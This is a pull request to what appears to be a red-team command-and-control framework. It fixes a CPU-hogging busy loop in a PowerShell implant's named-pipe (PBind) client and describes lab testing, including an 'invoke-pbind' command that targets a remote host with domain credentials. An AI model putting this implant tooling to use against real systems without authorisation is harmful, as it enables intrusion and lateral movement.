### PR TITLE
Fix an infinite loop in the PBind client

### DIFF
--- a/resources/modules/Invoke-Pbind.ps1
+++ b/resources/modules/Invoke-Pbind.ps1
@@ -482,7 +482,9 @@ try {
         }
         if (`$msg -match 'GOAGAIN') { break }
 
-        while(`$pipestate.command -eq `$null){ }
+        while(`$pipestate.command -eq `$null){
+            Start-Sleep -Milliseconds 100
+        }
         if (`$pipestate.kill -eq 'KILLPIPE') {
         `$encSure = Encrypt-String -unencryptedString 'SURE' -Key `$key
         `$pipeWriter.WriteLine(`$encSure)


### PR DESCRIPTION
Hi, fixed a small issue I noticed in the PBind client script-block, which caused the implant to use 100% of its core. This was caused by a free-running while-loop when the client was waiting for commands. Steps to reproduce are shown below:

**Initial Situation:**
- Powershell Implant running on a Windows 10 1909 Virtual Machine, joined to a Lab domain
- Resource monitor running and set to highlight resources consumed by the implant (powershell.exe)

From there, I ran a command to create a named pipe on a remote server:

`invoke-pbind -target 172.16.0.5 -Domain <domain> -User <user> -Password <password>`

This provoked a spike in CPU consumption, up until the pbind-kill command was issued, as shown below:

![image1](https://user-images.githubusercontent.com/11176964/83955664-326a5900-a84d-11ea-9024-78e303291b83.png)

Adding a 100ms sleeping period in the loop seemed to fix the issue:

![image2](https://user-images.githubusercontent.com/11176964/83955672-529a1800-a84d-11ea-9203-9534625a1969.png)